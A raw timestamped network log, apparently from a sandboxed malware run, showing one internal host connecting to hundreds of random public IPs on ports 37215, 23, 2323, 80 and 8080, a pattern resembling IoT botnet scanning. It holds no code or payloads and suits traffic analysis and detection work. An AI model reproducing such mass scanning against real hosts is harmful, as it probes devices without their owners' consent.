                                                            Feb 14, 2024 09:27:44.881684065 CET4067537215192.168.2.23197.228.128.172
                                                            Feb 14, 2024 09:27:44.881699085 CET4067537215192.168.2.23197.122.139.225
                                                            Feb 14, 2024 09:27:44.881721020 CET4067537215192.168.2.23197.227.24.103
                                                            Feb 14, 2024 09:27:44.881742954 CET4067537215192.168.2.23197.45.249.111
                                                            Feb 14, 2024 09:27:44.881752014 CET4067537215192.168.2.23197.89.209.105
                                                            Feb 14, 2024 09:27:44.881767035 CET4067537215192.168.2.23197.80.57.194
                                                            Feb 14, 2024 09:27:44.881787062 CET4067537215192.168.2.23197.54.194.13
                                                            Feb 14, 2024 09:27:44.881798983 CET4067537215192.168.2.23197.122.107.58
                                                            Feb 14, 2024 09:27:44.881815910 CET4067537215192.168.2.23197.227.12.44
                                                            Feb 14, 2024 09:27:44.881827116 CET4067537215192.168.2.23197.176.130.154
                                                            Feb 14, 2024 09:27:44.881848097 CET4067537215192.168.2.23197.86.147.251
                                                            Feb 14, 2024 09:27:44.881860018 CET4067537215192.168.2.23197.8.142.105
                                                            Feb 14, 2024 09:27:44.881877899 CET4067537215192.168.2.23197.70.42.232
                                                            Feb 14, 2024 09:27:44.881892920 CET4067537215192.168.2.23197.167.182.36
                                                            Feb 14, 2024 09:27:44.881937027 CET4067537215192.168.2.23197.34.111.83
                                                            Feb 14, 2024 09:27:44.881952047 CET4067537215192.168.2.23197.26.96.50
                                                            Feb 14, 2024 09:27:44.881968021 CET4067537215192.168.2.23197.155.34.17
                                                            Feb 14, 2024 09:27:44.881982088 CET4067537215192.168.2.23197.220.28.61
                                                            Feb 14, 2024 09:27:44.881992102 CET4067537215192.168.2.23197.126.27.178
                                                            Feb 14, 2024 09:27:44.882006884 CET4067537215192.168.2.23197.126.161.180
                                                            Feb 14, 2024 09:27:44.882019997 CET4067537215192.168.2.23197.71.155.106
                                                            Feb 14, 2024 09:27:44.882039070 CET4067537215192.168.2.23197.87.55.144
                                                            Feb 14, 2024 09:27:44.882059097 CET4067537215192.168.2.23197.79.180.29
                                                            Feb 14, 2024 09:27:44.882067919 CET4067537215192.168.2.23197.5.124.210
                                                            Feb 14, 2024 09:27:44.882090092 CET4067537215192.168.2.23197.46.67.164
                                                            Feb 14, 2024 09:27:44.882105112 CET4067537215192.168.2.23197.40.235.4
                                                            Feb 14, 2024 09:27:44.882118940 CET4067537215192.168.2.23197.150.58.48
                                                            Feb 14, 2024 09:27:44.882143021 CET4067537215192.168.2.23197.191.98.61
                                                            Feb 14, 2024 09:27:44.882143021 CET4067537215192.168.2.23197.173.5.193
                                                            Feb 14, 2024 09:27:44.882172108 CET4067537215192.168.2.23197.12.92.105
                                                            Feb 14, 2024 09:27:44.882190943 CET4067537215192.168.2.23197.57.104.59
                                                            Feb 14, 2024 09:27:44.882215977 CET4067537215192.168.2.23197.191.141.155
                                                            Feb 14, 2024 09:27:44.882236004 CET4067537215192.168.2.23197.91.180.144
                                                            Feb 14, 2024 09:27:44.882249117 CET4067537215192.168.2.23197.167.40.38
                                                            Feb 14, 2024 09:27:44.882272005 CET4067537215192.168.2.23197.18.15.74
                                                            Feb 14, 2024 09:27:44.882286072 CET4067537215192.168.2.23197.93.36.180
                                                            Feb 14, 2024 09:27:44.882308960 CET4067537215192.168.2.23197.66.177.57
                                                            Feb 14, 2024 09:27:44.882332087 CET4067537215192.168.2.23197.227.189.249
                                                            Feb 14, 2024 09:27:44.882340908 CET4067537215192.168.2.23197.195.86.168
                                                            Feb 14, 2024 09:27:44.882361889 CET4067537215192.168.2.23197.109.144.244
                                                            Feb 14, 2024 09:27:44.882378101 CET4067537215192.168.2.23197.47.227.247
                                                            Feb 14, 2024 09:27:44.882385969 CET4067537215192.168.2.23197.2.73.77
                                                            Feb 14, 2024 09:27:44.882401943 CET4067537215192.168.2.23197.253.68.201
                                                            Feb 14, 2024 09:27:44.882416964 CET4067537215192.168.2.23197.212.17.206
                                                            Feb 14, 2024 09:27:44.882438898 CET4067537215192.168.2.23197.195.161.132
                                                            Feb 14, 2024 09:27:44.882445097 CET4067537215192.168.2.23197.134.137.103
                                                            Feb 14, 2024 09:27:44.882460117 CET4067537215192.168.2.23197.99.82.131
                                                            Feb 14, 2024 09:27:44.882483006 CET4067537215192.168.2.23197.163.67.99
                                                            Feb 14, 2024 09:27:44.882505894 CET4067537215192.168.2.23197.50.30.212
                                                            Feb 14, 2024 09:27:44.882519960 CET4067537215192.168.2.23197.28.109.62
                                                            Feb 14, 2024 09:27:44.882534981 CET4067537215192.168.2.23197.115.196.16
                                                            Feb 14, 2024 09:27:44.882550955 CET4067537215192.168.2.23197.135.84.54
                                                            Feb 14, 2024 09:27:44.882563114 CET4067537215192.168.2.23197.168.147.85
                                                            Feb 14, 2024 09:27:44.882575035 CET4067537215192.168.2.23197.94.234.236
                                                            Feb 14, 2024 09:27:44.882601976 CET4067537215192.168.2.23197.159.12.108
                                                            Feb 14, 2024 09:27:44.882620096 CET4067537215192.168.2.23197.141.102.227
                                                            Feb 14, 2024 09:27:44.882632971 CET4067537215192.168.2.23197.11.28.234
                                                            Feb 14, 2024 09:27:44.882647038 CET4067537215192.168.2.23197.236.204.180
                                                            Feb 14, 2024 09:27:44.882658005 CET4067537215192.168.2.23197.247.165.117
                                                            Feb 14, 2024 09:27:44.882675886 CET4067537215192.168.2.23197.143.24.94
                                                            Feb 14, 2024 09:27:44.882703066 CET4067537215192.168.2.23197.227.202.159
                                                            Feb 14, 2024 09:27:44.882719040 CET4067537215192.168.2.23197.167.20.125
                                                            Feb 14, 2024 09:27:44.882741928 CET4067537215192.168.2.23197.86.208.120
                                                            Feb 14, 2024 09:27:44.882766008 CET4067537215192.168.2.23197.46.172.119
                                                            Feb 14, 2024 09:27:44.882781029 CET4067537215192.168.2.23197.149.193.17
                                                            Feb 14, 2024 09:27:44.882797956 CET4067537215192.168.2.23197.253.250.102
                                                            Feb 14, 2024 09:27:44.884089947 CET804067295.214.249.111192.168.2.23
                                                            Feb 14, 2024 09:27:44.901488066 CET510608080192.168.2.2331.136.149.44
                                                            Feb 14, 2024 09:27:44.904704094 CET804067295.213.203.34192.168.2.23
                                                            Feb 14, 2024 09:27:44.904778004 CET4067280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:44.909312963 CET804067295.101.71.205192.168.2.23
                                                            Feb 14, 2024 09:27:44.909414053 CET4067280192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:44.913072109 CET804067295.90.14.22192.168.2.23
                                                            Feb 14, 2024 09:27:44.913146019 CET4067280192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:44.919979095 CET804067295.170.253.105192.168.2.23
                                                            Feb 14, 2024 09:27:44.924727917 CET804067295.239.58.194192.168.2.23
                                                            Feb 14, 2024 09:27:44.933703899 CET804067295.233.85.22192.168.2.23
                                                            Feb 14, 2024 09:27:45.046304941 CET8038986112.124.185.183192.168.2.23
                                                            Feb 14, 2024 09:27:45.091048956 CET4069523192.168.2.23110.214.29.178
                                                            Feb 14, 2024 09:27:45.091048956 CET4069523192.168.2.23166.224.49.179
                                                            Feb 14, 2024 09:27:45.091051102 CET406952323192.168.2.23145.6.148.103
                                                            Feb 14, 2024 09:27:45.091078997 CET4069523192.168.2.23198.10.141.53
                                                            Feb 14, 2024 09:27:45.091078997 CET4069523192.168.2.23170.23.247.11
                                                            Feb 14, 2024 09:27:45.091080904 CET4069523192.168.2.23192.48.230.43
                                                            Feb 14, 2024 09:27:45.091080904 CET4069523192.168.2.23102.133.71.76
                                                            Feb 14, 2024 09:27:45.091080904 CET406952323192.168.2.2323.54.85.1
                                                            Feb 14, 2024 09:27:45.091080904 CET4069523192.168.2.2348.54.17.210
                                                            Feb 14, 2024 09:27:45.091082096 CET406952323192.168.2.23199.165.6.178
                                                            Feb 14, 2024 09:27:45.091082096 CET4069523192.168.2.2349.78.5.194
                                                            Feb 14, 2024 09:27:45.091084957 CET4069523192.168.2.23145.220.91.33
                                                            Feb 14, 2024 09:27:45.091088057 CET4069523192.168.2.23100.167.211.85
                                                            Feb 14, 2024 09:27:45.091109037 CET4069523192.168.2.23223.250.38.148
                                                            Feb 14, 2024 09:27:45.091109037 CET4069523192.168.2.2392.187.139.236
                                                            Feb 14, 2024 09:27:45.091110945 CET4069523192.168.2.23191.26.90.12
                                                            Feb 14, 2024 09:27:45.091110945 CET4069523192.168.2.23117.161.1.65
                                                            Feb 14, 2024 09:27:45.091111898 CET4069523192.168.2.2340.253.5.115
                                                            Feb 14, 2024 09:27:45.091111898 CET4069523192.168.2.23102.124.104.197
                                                            Feb 14, 2024 09:27:45.091111898 CET4069523192.168.2.23154.33.228.75
                                                            Feb 14, 2024 09:27:45.091118097 CET4069523192.168.2.2374.188.188.202
                                                            Feb 14, 2024 09:27:45.091118097 CET4069523192.168.2.23148.155.70.83
                                                            Feb 14, 2024 09:27:45.091118097 CET4069523192.168.2.2367.255.188.133
                                                            Feb 14, 2024 09:27:45.091118097 CET4069523192.168.2.231.90.41.141
                                                            Feb 14, 2024 09:27:45.091125965 CET406952323192.168.2.2336.17.125.10
                                                            Feb 14, 2024 09:27:45.091130972 CET4069523192.168.2.23101.138.59.62
                                                            Feb 14, 2024 09:27:45.091130972 CET4069523192.168.2.23223.133.103.19
                                                            Feb 14, 2024 09:27:45.091130972 CET4069523192.168.2.2368.100.144.15
                                                            Feb 14, 2024 09:27:45.091130972 CET406952323192.168.2.2346.175.95.28
                                                            Feb 14, 2024 09:27:45.091130972 CET4069523192.168.2.23192.8.180.244
                                                            Feb 14, 2024 09:27:45.091130972 CET4069523192.168.2.23216.38.26.61
                                                            Feb 14, 2024 09:27:45.091131926 CET4069523192.168.2.2363.33.202.105
                                                            Feb 14, 2024 09:27:45.091133118 CET4069523192.168.2.234.133.184.47
                                                            Feb 14, 2024 09:27:45.091130972 CET406952323192.168.2.23111.223.179.75
                                                            Feb 14, 2024 09:27:45.091133118 CET4069523192.168.2.2347.207.45.162
                                                            Feb 14, 2024 09:27:45.091133118 CET4069523192.168.2.23201.135.241.11
                                                            Feb 14, 2024 09:27:45.091144085 CET4069523192.168.2.2339.159.96.36
                                                            Feb 14, 2024 09:27:45.091145039 CET4069523192.168.2.2378.144.191.95
                                                            Feb 14, 2024 09:27:45.091145039 CET4069523192.168.2.23191.236.14.201
                                                            Feb 14, 2024 09:27:45.091145992 CET4069523192.168.2.2314.38.255.104
                                                            Feb 14, 2024 09:27:45.091145992 CET406952323192.168.2.2380.48.236.246
                                                            Feb 14, 2024 09:27:45.091150999 CET4069523192.168.2.23216.144.87.209
                                                            Feb 14, 2024 09:27:45.091150999 CET4069523192.168.2.23200.123.118.6
                                                            Feb 14, 2024 09:27:45.091150999 CET4069523192.168.2.23221.198.1.112
                                                            Feb 14, 2024 09:27:45.091165066 CET4069523192.168.2.2393.29.112.209
                                                            Feb 14, 2024 09:27:45.091164112 CET4069523192.168.2.2313.61.227.2
                                                            Feb 14, 2024 09:27:45.091164112 CET4069523192.168.2.2386.38.234.124
                                                            Feb 14, 2024 09:27:45.091165066 CET4069523192.168.2.232.62.25.49
                                                            Feb 14, 2024 09:27:45.091165066 CET4069523192.168.2.23177.246.80.167
                                                            Feb 14, 2024 09:27:45.091165066 CET4069523192.168.2.2360.61.43.157
                                                            Feb 14, 2024 09:27:45.091170073 CET4069523192.168.2.2383.219.182.136
                                                            Feb 14, 2024 09:27:45.091173887 CET4069523192.168.2.23103.253.63.176
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.23197.159.88.11
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.23216.44.141.108
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.23151.221.238.45
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.23172.137.245.142
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.2345.84.75.167
                                                            Feb 14, 2024 09:27:45.091180086 CET406952323192.168.2.2395.252.30.168
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.2381.110.70.22
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.23108.232.88.239
                                                            Feb 14, 2024 09:27:45.091175079 CET4069523192.168.2.2341.148.101.27
                                                            Feb 14, 2024 09:27:45.091192961 CET4069523192.168.2.23147.119.56.47
                                                            Feb 14, 2024 09:27:45.091193914 CET4069523192.168.2.23207.241.101.112
                                                            Feb 14, 2024 09:27:45.091192961 CET4069523192.168.2.23184.158.243.192
                                                            Feb 14, 2024 09:27:45.091192961 CET4069523192.168.2.2399.209.212.143
                                                            Feb 14, 2024 09:27:45.091192961 CET4069523192.168.2.23168.121.143.76
                                                            Feb 14, 2024 09:27:45.091198921 CET4069523192.168.2.23151.128.61.225
                                                            Feb 14, 2024 09:27:45.091193914 CET4069523192.168.2.23133.8.241.239
                                                            Feb 14, 2024 09:27:45.091198921 CET4069523192.168.2.2338.40.51.161
                                                            Feb 14, 2024 09:27:45.091198921 CET4069523192.168.2.2374.3.175.157
                                                            Feb 14, 2024 09:27:45.091204882 CET4069523192.168.2.23183.241.48.21
                                                            Feb 14, 2024 09:27:45.091204882 CET4069523192.168.2.23149.195.199.186
                                                            Feb 14, 2024 09:27:45.091204882 CET4069523192.168.2.2314.136.135.44
                                                            Feb 14, 2024 09:27:45.091204882 CET4069523192.168.2.23220.139.57.82
                                                            Feb 14, 2024 09:27:45.091228962 CET406952323192.168.2.235.180.183.175
                                                            Feb 14, 2024 09:27:45.091233015 CET4069523192.168.2.2394.50.221.205
                                                            Feb 14, 2024 09:27:45.091233015 CET4069523192.168.2.2339.103.204.139
                                                            Feb 14, 2024 09:27:45.091243029 CET4069523192.168.2.23179.219.233.182
                                                            Feb 14, 2024 09:27:45.091248035 CET4069523192.168.2.23150.149.54.8
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.23128.154.239.168
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.23218.111.124.251
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.23192.177.84.223
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.2382.178.91.46
                                                            Feb 14, 2024 09:27:45.091252089 CET4069523192.168.2.23118.171.209.178
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.2390.39.224.141
                                                            Feb 14, 2024 09:27:45.091249943 CET4069523192.168.2.2365.197.151.245
                                                            Feb 14, 2024 09:27:45.091262102 CET4069523192.168.2.23160.37.118.59
                                                            Feb 14, 2024 09:27:45.091267109 CET4069523192.168.2.2368.97.30.209
                                                            Feb 14, 2024 09:27:45.091267109 CET4069523192.168.2.23135.10.1.15
                                                            Feb 14, 2024 09:27:45.091269970 CET4069523192.168.2.2393.128.66.156
                                                            Feb 14, 2024 09:27:45.091279984 CET406952323192.168.2.2343.236.51.14
                                                            Feb 14, 2024 09:27:45.091284037 CET4069523192.168.2.2346.5.16.158
                                                            Feb 14, 2024 09:27:45.091289997 CET4069523192.168.2.23172.105.214.87
                                                            Feb 14, 2024 09:27:45.091289997 CET4069523192.168.2.23125.191.116.169
                                                            Feb 14, 2024 09:27:45.091289997 CET4069523192.168.2.23126.175.247.10
                                                            Feb 14, 2024 09:27:45.091303110 CET4069523192.168.2.2359.42.236.113
                                                            Feb 14, 2024 09:27:45.091310978 CET4069523192.168.2.2393.103.47.136
                                                            Feb 14, 2024 09:27:45.091311932 CET4069523192.168.2.2377.168.11.18
                                                            Feb 14, 2024 09:27:45.091311932 CET4069523192.168.2.23134.129.82.242
                                                            Feb 14, 2024 09:27:45.091311932 CET4069523192.168.2.23193.166.67.196
                                                            Feb 14, 2024 09:27:45.091320992 CET406952323192.168.2.23106.53.163.243
                                                            Feb 14, 2024 09:27:45.091336012 CET4069523192.168.2.23147.51.58.76
                                                            Feb 14, 2024 09:27:45.091336012 CET4069523192.168.2.23184.51.79.237
                                                            Feb 14, 2024 09:27:45.091341019 CET4069523192.168.2.2386.102.53.71
                                                            Feb 14, 2024 09:27:45.091351986 CET4069523192.168.2.2317.102.85.135
                                                            Feb 14, 2024 09:27:45.091351986 CET4069523192.168.2.23162.153.52.31
                                                            Feb 14, 2024 09:27:45.091356039 CET4069523192.168.2.2325.128.56.122
                                                            Feb 14, 2024 09:27:45.091361046 CET4069523192.168.2.23115.122.119.173
                                                            Feb 14, 2024 09:27:45.091373920 CET4069523192.168.2.23142.73.50.205
                                                            Feb 14, 2024 09:27:45.091377974 CET4069523192.168.2.23206.71.168.64
                                                            Feb 14, 2024 09:27:45.091378927 CET4069523192.168.2.23204.166.225.108
                                                            Feb 14, 2024 09:27:45.091381073 CET406952323192.168.2.23154.186.181.232
                                                            Feb 14, 2024 09:27:45.091388941 CET4069523192.168.2.2320.143.77.158
                                                            Feb 14, 2024 09:27:45.091388941 CET4069523192.168.2.2362.32.47.251
                                                            Feb 14, 2024 09:27:45.091388941 CET4069523192.168.2.2323.67.63.42
                                                            Feb 14, 2024 09:27:45.091388941 CET4069523192.168.2.23152.205.204.188
                                                            Feb 14, 2024 09:27:45.091401100 CET4069523192.168.2.23223.97.97.202
                                                            Feb 14, 2024 09:27:45.091406107 CET4069523192.168.2.23195.33.200.118
                                                            Feb 14, 2024 09:27:45.091408014 CET4069523192.168.2.23177.246.9.36
                                                            Feb 14, 2024 09:27:45.091413021 CET4069523192.168.2.23203.23.110.51
                                                            Feb 14, 2024 09:27:45.091415882 CET406952323192.168.2.23152.190.107.33
                                                            Feb 14, 2024 09:27:45.091427088 CET4069523192.168.2.2339.86.51.151
                                                            Feb 14, 2024 09:27:45.091428041 CET4069523192.168.2.23131.195.109.66
                                                            Feb 14, 2024 09:27:45.091435909 CET4069523192.168.2.23173.189.183.140
                                                            Feb 14, 2024 09:27:45.091438055 CET4069523192.168.2.23203.103.9.157
                                                            Feb 14, 2024 09:27:45.091438055 CET4069523192.168.2.2395.226.184.254
                                                            Feb 14, 2024 09:27:45.091449022 CET4069523192.168.2.2340.239.171.77
                                                            Feb 14, 2024 09:27:45.091449022 CET4069523192.168.2.23140.253.137.147
                                                            Feb 14, 2024 09:27:45.091460943 CET4069523192.168.2.2332.32.72.55
                                                            Feb 14, 2024 09:27:45.091460943 CET4069523192.168.2.23147.63.151.90
                                                            Feb 14, 2024 09:27:45.091465950 CET406952323192.168.2.23136.243.143.75
                                                            Feb 14, 2024 09:27:45.091469049 CET4069523192.168.2.2324.90.99.88
                                                            Feb 14, 2024 09:27:45.091469049 CET4069523192.168.2.23118.4.83.112
                                                            Feb 14, 2024 09:27:45.091485023 CET4069523192.168.2.2376.217.164.213
                                                            Feb 14, 2024 09:27:45.091486931 CET4069523192.168.2.2318.7.167.63
                                                            Feb 14, 2024 09:27:45.091486931 CET4069523192.168.2.23211.56.157.121
                                                            Feb 14, 2024 09:27:45.091491938 CET4069523192.168.2.23168.15.99.250
                                                            Feb 14, 2024 09:27:45.091491938 CET4069523192.168.2.23144.146.62.134
                                                            Feb 14, 2024 09:27:45.091502905 CET4069523192.168.2.23190.57.186.172
                                                            Feb 14, 2024 09:27:45.091506004 CET406952323192.168.2.23126.192.242.176
                                                            Feb 14, 2024 09:27:45.091507912 CET4069523192.168.2.2343.76.23.22
                                                            Feb 14, 2024 09:27:45.091516018 CET4069523192.168.2.23167.196.117.112
                                                            Feb 14, 2024 09:27:45.091521978 CET4069523192.168.2.23123.4.89.115
                                                            Feb 14, 2024 09:27:45.091541052 CET4069523192.168.2.23140.254.167.142
                                                            Feb 14, 2024 09:27:45.091545105 CET4069523192.168.2.23203.255.21.0
                                                            Feb 14, 2024 09:27:45.091547966 CET4069523192.168.2.23202.198.98.182
                                                            Feb 14, 2024 09:27:45.091552973 CET4069523192.168.2.23164.240.239.253
                                                            Feb 14, 2024 09:27:45.091553926 CET4069523192.168.2.23109.229.65.14
                                                            Feb 14, 2024 09:27:45.091558933 CET406952323192.168.2.23173.234.250.190
                                                            Feb 14, 2024 09:27:45.091562033 CET4069523192.168.2.2345.169.144.27
                                                            Feb 14, 2024 09:27:45.091562033 CET4069523192.168.2.23144.114.4.23
                                                            Feb 14, 2024 09:27:45.091564894 CET4069523192.168.2.23216.240.96.169
                                                            Feb 14, 2024 09:27:45.091573000 CET4069523192.168.2.23196.50.74.158
                                                            Feb 14, 2024 09:27:45.091578007 CET4069523192.168.2.2359.108.242.104
                                                            Feb 14, 2024 09:27:45.091578960 CET4069523192.168.2.23111.157.140.172
                                                            Feb 14, 2024 09:27:45.091583014 CET4069523192.168.2.2353.217.123.128
                                                            Feb 14, 2024 09:27:45.091583014 CET4069523192.168.2.23205.150.253.46
                                                            Feb 14, 2024 09:27:45.091588974 CET4069523192.168.2.23189.13.250.38
                                                            Feb 14, 2024 09:27:45.091588974 CET406952323192.168.2.23175.192.19.146
                                                            Feb 14, 2024 09:27:45.091588974 CET4069523192.168.2.2381.8.152.36
                                                            Feb 14, 2024 09:27:45.091589928 CET4069523192.168.2.2374.17.193.22
                                                            Feb 14, 2024 09:27:45.091597080 CET4069523192.168.2.23178.215.103.171
                                                            Feb 14, 2024 09:27:45.091597080 CET4069523192.168.2.23208.27.175.143
                                                            Feb 14, 2024 09:27:45.091597080 CET4069523192.168.2.23169.226.84.88
                                                            Feb 14, 2024 09:27:45.091599941 CET4069523192.168.2.23191.22.227.153
                                                            Feb 14, 2024 09:27:45.091603994 CET4069523192.168.2.23217.165.187.86
                                                            Feb 14, 2024 09:27:45.091603994 CET4069523192.168.2.2320.164.210.141
                                                            Feb 14, 2024 09:27:45.091620922 CET4069523192.168.2.2371.213.166.93
                                                            Feb 14, 2024 09:27:45.091622114 CET4069523192.168.2.23164.160.50.240
                                                            Feb 14, 2024 09:27:45.091620922 CET4069523192.168.2.23171.47.159.226
                                                            Feb 14, 2024 09:27:45.091622114 CET4069523192.168.2.2323.114.5.56
                                                            Feb 14, 2024 09:27:45.091626883 CET4069523192.168.2.23163.202.150.204
                                                            Feb 14, 2024 09:27:45.091626883 CET406952323192.168.2.23195.28.148.13
                                                            Feb 14, 2024 09:27:45.091638088 CET4069523192.168.2.23165.152.83.0
                                                            Feb 14, 2024 09:27:45.091640949 CET4069523192.168.2.2391.129.106.137
                                                            Feb 14, 2024 09:27:45.091643095 CET4069523192.168.2.2394.26.241.94
                                                            Feb 14, 2024 09:27:45.091650009 CET4069523192.168.2.2366.139.33.184
                                                            Feb 14, 2024 09:27:45.091654062 CET4069523192.168.2.23210.107.39.70
                                                            Feb 14, 2024 09:27:45.091665983 CET4069523192.168.2.2343.203.223.84
                                                            Feb 14, 2024 09:27:45.091666937 CET4069523192.168.2.23197.106.237.169
                                                            Feb 14, 2024 09:27:45.091680050 CET406952323192.168.2.23113.21.192.159
                                                            Feb 14, 2024 09:27:45.091686010 CET4069523192.168.2.23217.97.45.238
                                                            Feb 14, 2024 09:27:45.091691971 CET4069523192.168.2.23103.84.180.84
                                                            Feb 14, 2024 09:27:45.091691971 CET4069523192.168.2.2367.52.72.57
                                                            Feb 14, 2024 09:27:45.091700077 CET4069523192.168.2.2314.11.185.57
                                                            Feb 14, 2024 09:27:45.091705084 CET4069523192.168.2.2323.30.62.133
                                                            Feb 14, 2024 09:27:45.091706038 CET4069523192.168.2.23198.72.227.107
                                                            Feb 14, 2024 09:27:45.091708899 CET4069523192.168.2.23146.224.67.197
                                                            Feb 14, 2024 09:27:45.091727972 CET4069523192.168.2.2327.70.20.241
                                                            Feb 14, 2024 09:27:45.091728926 CET4069523192.168.2.23137.231.69.55
                                                            Feb 14, 2024 09:27:45.091732025 CET4069523192.168.2.23132.121.135.27
                                                            Feb 14, 2024 09:27:45.091736078 CET4069523192.168.2.23181.163.102.193
                                                            Feb 14, 2024 09:27:45.091736078 CET406952323192.168.2.2387.188.209.175
                                                            Feb 14, 2024 09:27:45.091737986 CET4069523192.168.2.23159.191.210.160
                                                            Feb 14, 2024 09:27:45.091738939 CET4069523192.168.2.23202.106.132.132
                                                            Feb 14, 2024 09:27:45.091763020 CET4069523192.168.2.2382.76.212.175
                                                            Feb 14, 2024 09:27:45.091763973 CET4069523192.168.2.2374.86.187.178
                                                            Feb 14, 2024 09:27:45.091763020 CET4069523192.168.2.2340.126.181.84
                                                            Feb 14, 2024 09:27:45.091763973 CET4069523192.168.2.2371.30.59.130
                                                            Feb 14, 2024 09:27:45.091778040 CET4069523192.168.2.2390.30.46.202
                                                            Feb 14, 2024 09:27:45.091779947 CET406952323192.168.2.2358.77.3.178
                                                            Feb 14, 2024 09:27:45.091779947 CET4069523192.168.2.23135.151.137.14
                                                            Feb 14, 2024 09:27:45.091779947 CET4069523192.168.2.23182.137.202.217
                                                            Feb 14, 2024 09:27:45.091785908 CET4069523192.168.2.2368.233.189.97
                                                            Feb 14, 2024 09:27:45.091787100 CET4069523192.168.2.23154.50.72.117
                                                            Feb 14, 2024 09:27:45.091787100 CET4069523192.168.2.23191.107.135.156
                                                            Feb 14, 2024 09:27:45.091799974 CET4069523192.168.2.2345.163.137.185
                                                            Feb 14, 2024 09:27:45.091801882 CET4069523192.168.2.2371.140.81.254
                                                            Feb 14, 2024 09:27:45.091809988 CET4069523192.168.2.23161.45.45.204
                                                            Feb 14, 2024 09:27:45.091819048 CET406952323192.168.2.23156.113.244.255
                                                            Feb 14, 2024 09:27:45.091820955 CET4069523192.168.2.23169.202.74.129
                                                            Feb 14, 2024 09:27:45.091820955 CET4069523192.168.2.23168.242.236.41
                                                            Feb 14, 2024 09:27:45.091834068 CET4069523192.168.2.23119.37.241.167
                                                            Feb 14, 2024 09:27:45.091836929 CET4069523192.168.2.23205.27.189.52
                                                            Feb 14, 2024 09:27:45.091840029 CET4069523192.168.2.23191.33.64.242
                                                            Feb 14, 2024 09:27:45.091840982 CET4069523192.168.2.2387.200.81.79
                                                            Feb 14, 2024 09:27:45.091847897 CET4069523192.168.2.23142.111.102.10
                                                            Feb 14, 2024 09:27:45.091857910 CET4069523192.168.2.2342.128.170.123
                                                            Feb 14, 2024 09:27:45.091861963 CET4069523192.168.2.2378.112.81.228
                                                            Feb 14, 2024 09:27:45.091862917 CET4069523192.168.2.23118.195.193.90
                                                            Feb 14, 2024 09:27:45.091876030 CET4069523192.168.2.2371.231.146.194
                                                            Feb 14, 2024 09:27:45.091876984 CET406952323192.168.2.23204.84.122.211
                                                            Feb 14, 2024 09:27:45.091892004 CET4069523192.168.2.23192.13.57.206
                                                            Feb 14, 2024 09:27:45.091897964 CET4069523192.168.2.23212.65.243.1
                                                            Feb 14, 2024 09:27:45.091897964 CET4069523192.168.2.23142.177.220.168
                                                            Feb 14, 2024 09:27:45.091903925 CET4069523192.168.2.2393.99.83.157
                                                            Feb 14, 2024 09:27:45.091912031 CET4069523192.168.2.2351.154.181.218
                                                            Feb 14, 2024 09:27:45.091917992 CET4069523192.168.2.2349.202.194.155
                                                            Feb 14, 2024 09:27:45.091923952 CET4069523192.168.2.2346.131.99.58
                                                            Feb 14, 2024 09:27:45.091923952 CET4069523192.168.2.2387.217.234.139
                                                            Feb 14, 2024 09:27:45.091924906 CET406952323192.168.2.23165.102.237.216
                                                            Feb 14, 2024 09:27:45.091937065 CET4069523192.168.2.23164.117.28.25
                                                            Feb 14, 2024 09:27:45.091943026 CET4069523192.168.2.23141.146.63.160
                                                            Feb 14, 2024 09:27:45.091943026 CET4069523192.168.2.2320.24.239.12
                                                            Feb 14, 2024 09:27:45.091943026 CET4069523192.168.2.23134.44.155.45
                                                            Feb 14, 2024 09:27:45.091944933 CET4069523192.168.2.2399.250.131.31
                                                            Feb 14, 2024 09:27:45.091944933 CET4069523192.168.2.23149.169.208.38
                                                            Feb 14, 2024 09:27:45.091950893 CET4069523192.168.2.23109.146.62.11
                                                            Feb 14, 2024 09:27:45.091954947 CET4069523192.168.2.2392.239.94.14
                                                            Feb 14, 2024 09:27:45.091954947 CET4069523192.168.2.23200.104.52.255
                                                            Feb 14, 2024 09:27:45.091954947 CET4069523192.168.2.23108.254.186.255
                                                            Feb 14, 2024 09:27:45.091954947 CET406952323192.168.2.23168.143.170.73
                                                            Feb 14, 2024 09:27:45.091969013 CET4069523192.168.2.23222.250.42.197
                                                            Feb 14, 2024 09:27:45.091976881 CET4069523192.168.2.2312.175.251.183
                                                            Feb 14, 2024 09:27:45.091979027 CET4069523192.168.2.23134.243.79.64
                                                            Feb 14, 2024 09:27:45.091979027 CET4069523192.168.2.23218.119.40.102
                                                            Feb 14, 2024 09:27:45.091990948 CET4069523192.168.2.23102.10.199.131
                                                            Feb 14, 2024 09:27:45.091999054 CET4069523192.168.2.23124.191.198.52
                                                            Feb 14, 2024 09:27:45.092000008 CET4069523192.168.2.2331.119.84.32
                                                            Feb 14, 2024 09:27:45.092005014 CET4069523192.168.2.2389.213.233.252
                                                            Feb 14, 2024 09:27:45.092011929 CET406952323192.168.2.2359.226.210.216
                                                            Feb 14, 2024 09:27:45.092012882 CET4069523192.168.2.23145.116.23.126
                                                            Feb 14, 2024 09:27:45.092012882 CET4069523192.168.2.2313.131.156.213
                                                            Feb 14, 2024 09:27:45.092027903 CET4069523192.168.2.23139.23.25.181
                                                            Feb 14, 2024 09:27:45.092029095 CET4069523192.168.2.23105.5.229.234
                                                            Feb 14, 2024 09:27:45.092031956 CET4069523192.168.2.2318.56.239.157
                                                            Feb 14, 2024 09:27:45.092045069 CET4069523192.168.2.23208.126.25.112
                                                            Feb 14, 2024 09:27:45.092046976 CET4069523192.168.2.23159.208.59.190
                                                            Feb 14, 2024 09:27:45.092048883 CET4069523192.168.2.23202.119.52.201
                                                            Feb 14, 2024 09:27:45.092062950 CET4069523192.168.2.23163.76.56.252
                                                            Feb 14, 2024 09:27:45.092063904 CET406952323192.168.2.2347.17.12.147
